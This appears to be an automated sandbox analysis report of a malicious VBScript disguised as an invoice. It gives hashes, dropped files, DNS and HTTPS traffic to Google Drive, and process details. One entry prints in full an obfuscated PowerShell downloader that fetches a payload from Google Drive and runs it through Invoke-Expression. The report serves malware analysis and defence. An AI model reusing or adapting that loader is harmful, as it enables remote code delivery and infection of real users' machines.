Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eqhw45uk.d0b.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xef2zxxa.h5r.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Cabassou.Tun

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	HTML document, ASCII text, with very long lines (1692), with no line terminators
Category:	dropped
Size (bytes):	1692
Entropy (8bit):	5.110940634804961
Encrypted:	false
SSDEEP:	24:hazsppqhlvhXlhEG0qnXXX08Ucq9J8mZoWHMzj+cB7jTsoT9FyVZ81wmna:7p4vmRq+fjsueFYaWJ
MD5:	63F98CDF24083ABD8462B7E9D92C928F
SHA1:	CC97CAF1083749B183167376457AF74A2D46A5E5
SHA-256:	A60F00E9D800C6A479A51CA2CC5FB56B05D98CEE967597EC373DBC115FD405FF
SHA-512:	278CDF24E26C0C2EC9E9B8F8B92AB7B5279D0043019B349D436FA5533E42DC1454C786B24B5D4B4C3F59C54E1FB70AF6E1DCC2FE775BF80F7EE65D816BA42EE8
Malicious:	false
Reputation:	low
Preview:	<!DOCTYPE html><html><head><title>Google Drive - Infected file</title><meta http-equiv="content-type" content="text/html; charset=utf-8"/><style nonce="hMLA-B717nPeW5UPzK3MyA">.goog-link-button{position:relative;color:#15c;text-decoration:underline;cursor:pointer}.goog-link-button-disabled{color:#ccc;text-decoration:none;cursor:default}body{color:#222;font:normal 13px/1.4 arial,sans-serif;margin:0}.grecaptcha-badge{visibility:hidden}.uc-main{padding-top:50px;text-align:center}#uc-dl-icon{display:inline-block;margin-top:16px;padding-right:1em;vertical-align:top}#uc-text{display:inline-block;max-width:68ex;text-align:left}.uc-error-caption,.uc-warning-caption{color:#222;font-size:16px}#uc-download-link{text-decoration:none}.uc-name-size a{color:#15c;text-decoration:none}.uc-name-size a:visited{color:#61c;text-decoration:none}.uc-name-size a:active{color:#d14836;text-decoration:none}.uc-footer{color:#777;font-size:11px;padding-bottom:5ex;padding-top:5ex;text-align:center}.uc-footer a{colo

Static File Info

General

File type:	ASCII text, with CRLF line terminators
Entropy (8bit):	5.254388946138046
TrID:	Visual Basic Script (13500/0) 100.00%
File name:	FACTURA 130424435.vbs
File size:	215'828 bytes
MD5:	361f71c64cdcf7f56f8e6c2389401b89
SHA1:	315b4b37555a2b0f82837a94753fbd36bad2f5fd
SHA256:	dbc99b1d313999e21fd15d8386d69d56067c2a578c9658fbff8f749e93f04eae
SHA512:	039b1f1f368568c37a674a7fca0a6d2d9e1944787aff7b8292f3e563b9ec1c0af59f70c29072862d0110c40eba008f1f6c0e01c39040d3dbcb636fba1d33e652
SSDEEP:	6144:KYBgIjQvrMbWSR4WHUJJs9E87Fy4lZrUChpqKmjum4QlNVrDjXR46cCPCRJfyq30:P2dONnpu
TLSH:	2D2408F0DF0B36199F5B3EDAAC6445924AF84195051238B5AAD817ECB283D2CE3FDD18
File Content Preview:	..'Lollup kystvagt? newscasters195: wirrah: premade..'fernbrake; overdominating dures forsgsordnings?..'Rashnesses; ulykkesfuglene depositive stimulansers72..'Makroerne bidery? typewrote..'Jagtbderne nonleprous..'Dateringsforsgets128, maries:.. ..'Tordenb

File Icon


Icon Hash:	68d69b8f86ab9a86

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 18, 2024 11:05:57.021472931 CEST	49706	443	192.168.2.8	142.250.105.102
Apr 18, 2024 11:05:57.021514893 CEST	443	49706	142.250.105.102	192.168.2.8
Apr 18, 2024 11:05:57.022547007 CEST	49706	443	192.168.2.8	142.250.105.102
Apr 18, 2024 11:05:57.030757904 CEST	49706	443	192.168.2.8	142.250.105.102
Apr 18, 2024 11:05:57.030776978 CEST	443	49706	142.250.105.102	192.168.2.8
Apr 18, 2024 11:05:57.261363983 CEST	443	49706	142.250.105.102	192.168.2.8
Apr 18, 2024 11:05:57.261574984 CEST	49706	443	192.168.2.8	142.250.105.102
Apr 18, 2024 11:05:57.262305975 CEST	443	49706	142.250.105.102	192.168.2.8
Apr 18, 2024 11:05:57.262387991 CEST	49706	443	192.168.2.8	142.250.105.102
Apr 18, 2024 11:05:57.267508984 CEST	49706	443	192.168.2.8	142.250.105.102
Apr 18, 2024 11:05:57.267517090 CEST	443	49706	142.250.105.102	192.168.2.8
Apr 18, 2024 11:05:57.267790079 CEST	443	49706	142.250.105.102	192.168.2.8
Apr 18, 2024 11:05:57.280270100 CEST	49706	443	192.168.2.8	142.250.105.102
Apr 18, 2024 11:05:57.328114033 CEST	443	49706	142.250.105.102	192.168.2.8
Apr 18, 2024 11:05:57.511917114 CEST	443	49706	142.250.105.102	192.168.2.8
Apr 18, 2024 11:05:57.512335062 CEST	443	49706	142.250.105.102	192.168.2.8
Apr 18, 2024 11:05:57.512500048 CEST	49706	443	192.168.2.8	142.250.105.102
Apr 18, 2024 11:05:57.515104055 CEST	49706	443	192.168.2.8	142.250.105.102
Apr 18, 2024 11:05:57.631247044 CEST	49707	443	192.168.2.8	173.194.219.132
Apr 18, 2024 11:05:57.631283998 CEST	443	49707	173.194.219.132	192.168.2.8
Apr 18, 2024 11:05:57.631431103 CEST	49707	443	192.168.2.8	173.194.219.132
Apr 18, 2024 11:05:57.631927013 CEST	49707	443	192.168.2.8	173.194.219.132
Apr 18, 2024 11:05:57.631942034 CEST	443	49707	173.194.219.132	192.168.2.8
Apr 18, 2024 11:05:57.879102945 CEST	443	49707	173.194.219.132	192.168.2.8
Apr 18, 2024 11:05:57.879278898 CEST	49707	443	192.168.2.8	173.194.219.132
Apr 18, 2024 11:05:57.882472038 CEST	49707	443	192.168.2.8	173.194.219.132
Apr 18, 2024 11:05:57.882484913 CEST	443	49707	173.194.219.132	192.168.2.8
Apr 18, 2024 11:05:57.882771969 CEST	443	49707	173.194.219.132	192.168.2.8
Apr 18, 2024 11:05:57.883816957 CEST	49707	443	192.168.2.8	173.194.219.132
Apr 18, 2024 11:05:57.928124905 CEST	443	49707	173.194.219.132	192.168.2.8
Apr 18, 2024 11:05:58.585520983 CEST	443	49707	173.194.219.132	192.168.2.8
Apr 18, 2024 11:05:58.585573912 CEST	443	49707	173.194.219.132	192.168.2.8
Apr 18, 2024 11:05:58.585635900 CEST	443	49707	173.194.219.132	192.168.2.8
Apr 18, 2024 11:05:58.587146044 CEST	49707	443	192.168.2.8	173.194.219.132
Apr 18, 2024 11:05:58.587146044 CEST	49707	443	192.168.2.8	173.194.219.132
Apr 18, 2024 11:05:58.588133097 CEST	49707	443	192.168.2.8	173.194.219.132

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 18, 2024 11:05:56.909962893 CEST	55258	53	192.168.2.8	1.1.1.1
Apr 18, 2024 11:05:57.014674902 CEST	53	55258	1.1.1.1	192.168.2.8
Apr 18, 2024 11:05:57.517302990 CEST	60655	53	192.168.2.8	1.1.1.1
Apr 18, 2024 11:05:57.622591019 CEST	53	60655	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 18, 2024 11:05:56.909962893 CEST	192.168.2.8	1.1.1.1	0xbf33	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Apr 18, 2024 11:05:57.517302990 CEST	192.168.2.8	1.1.1.1	0x8fc8	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Apr 18, 2024 11:05:53.672084093 CEST	1.1.1.1	192.168.2.8	0x5159	No error (0)	bg.microsoft.map.fastly.net	199.232.210.172	A (IP address)	IN (0x0001)	false
Apr 18, 2024 11:05:53.672084093 CEST	1.1.1.1	192.168.2.8	0x5159	No error (0)	bg.microsoft.map.fastly.net	199.232.214.172	A (IP address)	IN (0x0001)	false
Apr 18, 2024 11:05:57.014674902 CEST	1.1.1.1	192.168.2.8	0xbf33	No error (0)	drive.google.com	142.250.105.102	A (IP address)	IN (0x0001)	false
Apr 18, 2024 11:05:57.014674902 CEST	1.1.1.1	192.168.2.8	0xbf33	No error (0)	drive.google.com	142.250.105.138	A (IP address)	IN (0x0001)	false
Apr 18, 2024 11:05:57.014674902 CEST	1.1.1.1	192.168.2.8	0xbf33	No error (0)	drive.google.com	142.250.105.113	A (IP address)	IN (0x0001)	false
Apr 18, 2024 11:05:57.014674902 CEST	1.1.1.1	192.168.2.8	0xbf33	No error (0)	drive.google.com	142.250.105.101	A (IP address)	IN (0x0001)	false
Apr 18, 2024 11:05:57.014674902 CEST	1.1.1.1	192.168.2.8	0xbf33	No error (0)	drive.google.com	142.250.105.100	A (IP address)	IN (0x0001)	false
Apr 18, 2024 11:05:57.014674902 CEST	1.1.1.1	192.168.2.8	0xbf33	No error (0)	drive.google.com	142.250.105.139	A (IP address)	IN (0x0001)	false
Apr 18, 2024 11:05:57.622591019 CEST	1.1.1.1	192.168.2.8	0x8fc8	No error (0)	drive.usercontent.google.com	173.194.219.132	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49706	142.250.105.102	443	1644	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-18 09:05:57 UTC	215	OUT	GET /uc?export=download&id=10njVWCq2qkMZzklkAMXZ6T15jTP2RkbH HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Connection: Keep-Alive
2024-04-18 09:05:57 UTC	1582	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 18 Apr 2024 09:05:57 GMT Location: https://drive.usercontent.google.com/download?id=10njVWCq2qkMZzklkAMXZ6T15jTP2RkbH&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'nonce-VA2ydqPgiAvEEJ5rLzDDXw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factor=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49707	173.194.219.132	443	1644	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-18 09:05:57 UTC	233	OUT	GET /download?id=10njVWCq2qkMZzklkAMXZ6T15jTP2RkbH&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.usercontent.google.com Connection: Keep-Alive
2024-04-18 09:05:58 UTC	2121	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ABPtcPpy4_WIXYOBACK1AWzYA1uTvreMVu83xlcPefDHDmvr_tuHOMEpGh6pv3RsVNHEBweeIBE Content-Type: text/html; charset=utf-8 Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 18 Apr 2024 09:05:58 GMT P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Security-Policy: script-src 'nonce-pMhLY47FLqWRumbgjxR-yw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Resource-Policy: same-site Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factor=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin reporting-endpoints: default="/_/DriveUntrustedContentHttp/web-reports?context=eJzj0tDikmJw0ZBisN47ndUeiJ3SZ7CGAPHqn-dY1wPx4rDzrCuAWIiH49uR5o1sAie2dv1hBAAKNhWQ" Content-Length: 1692 Server: UploadServer Set-Cookie: NID=513=CjoaiVM7Jt10yNX6Fd5n-6uRX1uozZVUMTnLRy33jUP8K_xkb2-WpvkLp7rYjPu2liTKKl2zdawF0QbyrHUAWSypV8O8LX29llVg_QbyeQvGJkkRE3fdBoD_yL1xOi-nt61gzgRPfJWfvSHStRsR_PKwKiXKKTZDwCGn8l4Dr54; expires=Fri, 18-Oct-2024 09:05:58 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-04-18 09:05:58 UTC	1692	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 47 6f 6f 67 6c 65 20 44 72 69 76 65 20 2d 20 49 6e 66 65 63 74 65 64 20 66 69 6c 65 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 68 4d 4c 41 2d 42 37 31 37 6e 50 65 57 35 55 50 7a 4b 33 4d 79 41 22 3e 2e 67 6f 6f 67 2d 6c 69 6e 6b 2d 62 75 74 74 6f 6e 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6f 6c 6f 72 3a 23 31 35 63 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 63 75 72 73 6f 72 Data Ascii: <!DOCTYPE html><html><head><title>Google Drive - Infected file</title><meta http-equiv="content-type" content="text/html; charset=utf-8"/><style nonce="hMLA-B717nPeW5UPzK3MyA">.goog-link-button{position:relative;color:#15c;text-decoration:underline;cursor

Target ID:	0
Start time:	11:05:52
Start date:	18/04/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FACTURA 130424435.vbs"
Imagebase:	0x7ff68f2f0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	11:05:54
Start date:	18/04/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Epidydimus = 1;$Painters21='Substrin';$Painters21+='g';Function Antimeningococcic($gejstligt){$Nosher=$gejstligt.Length-$Epidydimus;For($Antisnapper=5; $Antisnapper -lt $Nosher; $Antisnapper+=(6)){$taxmen+=$gejstligt.$Painters21.Invoke($Antisnapper, $Epidydimus);}$taxmen;}function cairned($Fremvisningen){. ($Chantors) ($Fremvisningen);}$Veteraness=Antimeningococcic 'ManitMNeph,oNringzregili.hiotlAspirlMet.raKlis,/ Un.e5Svam,. Afvi0Bryde Hjlp(ThundWFemmliKoo.dnServidAlkohoVetuswGlaiesTaare TtsluNDdfdsTOvern erhve1Ambas0 vatp.Therm0Quito;Caul Nonl WLinieiRe,ubnCarah6Feabe4Finia;Malac .apeixL,lla6Re,ro4Ungar;Pre.n NoterGastrvAgmas:bazzi1Tr.me2 Neph1Spe,l.N ter0Sev.r)Velve RepriG CelievasalcChon.kPampaorecta/Okkup2Prs,r0Radom1Entoc0Vov,d0Nonst1Hemag0,aama1 ksam FamilFUdadriRidgir NotceCh.llfCenoso .rorxCoons/ Warn1F.mte2Skede1Udgif.Ties.0Solip ';$Maskinafdelinger=Antimeningococcic 'IndviU,ablesDomineBrou,r Blok-TabifAnuculgSeksee ,ccenHandbtOutbu ';$Trngendes=Antimeningococcic ' AlpehDurditAfbrytTagliphabilsKal,i:Super/Dee,d/Feticd Showr CymoiLokalvReheae lant. Tvrfg tjsvo Flado ResogSe,iclSaf,aeSpiro.Lnpolc GilloNive mUntan/c viluPate cWa,tr?SmelteConquxSp itpSta,doServir O.ert ramp=BoldhdGeon.ogriotw IndknTromllAffreo diskaUdmand.orti&PhylliDe.rwdTaint=Nonp,1 Pinn0InddanAktivj LarmVKoombWCatalCbn.elqag.ip2 Undeq kos kNonreM.anscZ eddyzMiniakArticlAfkogk PoveAArdeaM WiseX,alinZVenge6Epit TPenge1Recla5,entrjVek,lTLevneP nder2 glycRVinhakRaakrbSamfuHPont. ';$Skulapstavs=Antimeningococcic 'Delig>Crash ';$Chantors=Antimeningococcic 'FlymeiMasoneHash.xShei ';$Anniversariness = Antimeningococcic 'no.mae Sta,cBassoh.gpaaoUdv.k Symp% Wi,daS,mfupMisr,pMedendHa niaSystetOverfaMotst% .ryd\BadesCAnt.caBe alb .esaa,repssHuskesMalguoForesuEvolu.FungiTStatsuPoundnOpst Palae&disku&Chain cretaeRadiocSarcohBegrao Arar Anato$Divis ';cairned (Antimeningococcic 'Unim $Afvu,gHenk,lOve eoGallib PreaaExinglHilbe:LlebrT,entroFort s PahacOversaRamifn Ana aOmski=Tor i(AntalcAc.mpmIdeendTalel Nylon/rif,ec Vamb korru$ AgarA sychnWinten Phoniho otvdeltaeRudelrAvilasG lioa,kalmrBastkiAa,eknSol.reFortrsBlocks .agr)Subpr ');cairned (Antimeningococcic ' oshy$MoblegS.kofl Fac,o VocabTrst aKonomlPipin:,elchLtidssyCellanO,iefn For eBrnd dSynodsSaddelA.iata,orbrgrevesePreasnGaranedesi.s Anjo1Sku k6Black=Affal$ KommTSae nrE,astnNedrigAiluregodsen.rypad TerreLdigesUnref.BjergsEk,popJorddlA retiStrantManag(Cuber$B gaeSCarlyk Counu R,tulSlacka TriapFucussLancetLampeaNeutrvSa mesTral.)Septa ');$Trngendes=$Lynnedslagenes16[0];cairned (Antimeningococcic '.ubgo$EpiskgIn.asl ,tamoSuprab Infoa.esoelThe,r:FniscM.echaeOpkrvtAerataKretslH,elclGaussiSub efRegalaRic.icsh oott.geru.irkerBeco e Anar= Afg NForgre DryrwAuric-Anlg OAm hibtangajFs,ebe AmulcHvalptGroun FriedST nefyForfasEngratBlodmeThrummortho. aludNpropoeDomsttPa ad.AgouaWJobb eFletsbSamliC appllChis.i ErkleBogbin .liftPr,oc ');cairned (Antimeningococcic ' Di,t$JochuM,uktieButtytSvagha Hus,lTronplKultuiSugenftod laudvikcMerist HoveuMa,kirsextuePl.st.SekteHSkovbeTilbjaBe.ald matee Stalr.rivasSyzy [ Fusi$ zithM BaroaBaaddsRetiak onciStradnSpdbraA,odifDriftdLgdereH,brilKthibiT.kepnVggengVersieIdiotrLsten] Anth=Cytop$Muls.VInequeFyrintBo.hoe indirOpga.aEri.cnBolige Res s nysks ande ');$Demonstrerbares212=Antimeningococcic ' DeliM sildeGavebt Bomba pre,lProdul Medli TrstfOutpoaEduc cPlesktFootsu D ferCompleRefer.Spin,DPanscoMultiw PercnWindslBevbnoEpictaungdodTjeneF Edr ichabolUndereSlagb(Sub,e$FaenoTischirButo,nunireg PlejeBegrunNonskdAffe.eCutarsScimi,El.os$ ulvSkondes ombyte eazeSkarlrPredes otakEctopiFodb,belekteAttessB,ase) Bucc ';$Demonstrerbares212=$Toscana[1]+$Demonstrerbares212;$Ssterskibes=$Toscana[0];cairned (Antimeningococcic 'Sub a$Anflyg mpilun.ino SkrabSjuskaGalehlData,:BaglaSTripovProluoHe tyvInterlBarrapSaliclTro,seA jur= R ad(FgridTUnpa eAfknasTiaart Ster-enthrPSeizuaScopetItalihbegso Polyg$Err.tS,horesRetartStipeeMicrorGenfosminimkChattiStrikbKojaneDukkes ive)ka,ve ');while (!$Svovlple) {cairned (Antimeningococcic ' Sona$ Bi lgEpexelOmbygoS mpabMisc,aHervalTharb:Milkwa Uncel LedilFors.eMegawrA bilgBrystiEnd rsTubulkUndereJusti=Tragi$ ForltAffekr petiuUdbenefrer. ') ;cairned $Demonstrerbares212;cairned (Antimeningococcic 'VitelSb,odetCapitaThougrWispltBadel-FiberS IntelL ftfeFibroe PartpUindf D.age4Akter ');cairned (Antimeningococcic ' Svar$ForsygO tstl.orbioPla sbAccelaAm,lelBegga:C,ndeSBotanvPirrio orgivHrecelHeb,opHyperlQuotee ,ltr=Skvad(HolomTBordvetrapdsFlaprt cica-panatPC.eriaRser.tg,lloh Dis Ratem$B.skaS .etssOm,egt Patce.hamarBordesMiddekUdforiS ndebGast e I,dgs un o)Overl ') ;cairned (Antimeningococcic 'A ter$huffmg BrnelVindko alkubsvmmeaPe.fol,ikol:Overgb undeu HassgDroutsHlhjde,ortyrBlaaseS,kketBostt=Optak$ fa cg SvoglTaurooForhobLame.aTeknolWesse:SpaniH Le.evUninviGa.indFrikttJordsnReacciLysesnCl,mog ournecandlrReshanBortfePakke+Pecha+By el% Ndud$ NoniLU plyyMessin StrenIncineCentedT rbasHypoclEnfana PhysgVenipeTrag npseu,e,transConfe1Unhe,6 Span.Grif,cHaando MannuTjrslnGunsttPrpar ') ;$Trngendes=$Lynnedslagenes16[$bugseret];}cairned (Antimeningococcic 'Tilba$CatapgDejeclWaysioContobErgoma Mot lBandl:NonreC licehHurtir Lg,koDulutmApproeT ivlpmeddllSan taTh,matUncu.eOve.rdBasal atro = Alis OrddaGBak.de MidttRicke-BlafrCPrecioreh.bnflappt Pas,e,aedanDudlettrprv Unart$PrismSMalaxsMeliot Carbe,onfor Appesstay k SamoiMarrob Supee phars A in ');cairned (Antimeningococcic 'T.rap$PraedgVlgerlUnprooBuks.bSta,sasoc,olFl,me:,ichlD Kropo Slagedermo Anglo=Pru.t ,romi[Squi.S SmalyForslsM liet heateF rtimDunde. TroeCTinfooP litnChubbv ammeeLder,r C.nvtSl,ve].olyc:smelt: S.brF JenbrPompsosognemOctoaB MezuaDriftsEmblee Debi6Besky4Caco,S ispetGlendr Gr diChantn,raktg Shop(Au or$S steCCumbrh DisprK.ldkoRescimOdileeVr,iapC taglOmegnaSanittConfeePirkldAro.a)Zoril ');cairned (Antimeningococcic ' U,fl$Snickg Belul.annioC.rysbdefa,aTrvarlPreco: OmelWBrutaiZa.zutSchtihGenaunPrinsaCont,y Ugen Omar.=Aconi Drows[AreteSUdby yZi,zasTr.klt OvereAnthrmFje.n. ilbuTTaggeeNarcox .vertSa sr. Kon.EBochen SkelcSt,rnoReexpdbi.oiiPre onPaga gefter]Scra :Samti:J venAHerreSunderCth.rmIC iasIIrked. OverGMicroe .nditInspiSLd,amt Pla,rTussoiparamnHet,agJordl( Afme$ LageD Hytvo gelsebaand)Spytk ');cairned (Antimeningococcic 'Sinec$CuspygLiderlSineboR,ngeb vareaT.gthlAf,it:NegerHFrifiaStikkr En reAndensProagkNonpeaNo.liaswi hr Lobesforpu= r.al$Sk.leWSn.taiXylyltRejs,hAutocn issaUpbanyVi.se.Beechs AnaluFilmubTergesciv.lt Er,ir KrysiScripn DestgA non(Ce lp3Hiv.u0 Hvin1Merri6 Samt8 ues5Praes,,arbo2Baiss8Chifr3Outro0B,nzi4elect) Sani ');cairned $Hareskaars;"
Imagebase:	0x7ff6cb6b0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	11:05:54
Start date:	18/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	11:05:56
Start date:	18/04/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cabassou.Tun && echo $"
Imagebase:	0x7ff74f760000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Function 00007FFB4B337D95 Relevance: 6.7, Strings: 5, Instructions: 449COMMON

Download Yara Rule

Strings

@JK, xrefs: 00007FFB4B337FE8
@JK, xrefs: 00007FFB4B338104
@JK, xrefs: 00007FFB4B337E7D
@JK, xrefs: 00007FFB4B337F1C
@JK, xrefs: 00007FFB4B337F53

Memory Dump Source

Source File: 00000002.00000002.1532085025.00007FFB4B330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb4b330000_powershell.jbxd

Similarity

API ID:
String ID: @JK$@JK$@JK$@JK$@JK
API String ID: 0-2976473624
Opcode ID: 49df6ddf0fa92cfd3318b468e9e75f8fd9d6ff71da6ce26cc2251d73decac6a6
Instruction ID: 92819e6e2205e8ce2ea73abc34a9d5138c4d79e7ff7e37aef5b419f197dfcc21
Opcode Fuzzy Hash: 49df6ddf0fa92cfd3318b468e9e75f8fd9d6ff71da6ce26cc2251d73decac6a6
Instruction Fuzzy Hash: 52D148A390EBCA9FE796AE78C8549B67BE0FF46310B1441FED54CC70A3DA199C058351

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4B3355BE Relevance: 1.4, Strings: 1, Instructions: 193COMMON

Download Yara Rule

Strings

P,KK, xrefs: 00007FFB4B33572E

Memory Dump Source

Source File: 00000002.00000002.1532085025.00007FFB4B330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb4b330000_powershell.jbxd

Similarity

API ID:
String ID: P,KK
API String ID: 0-698180076
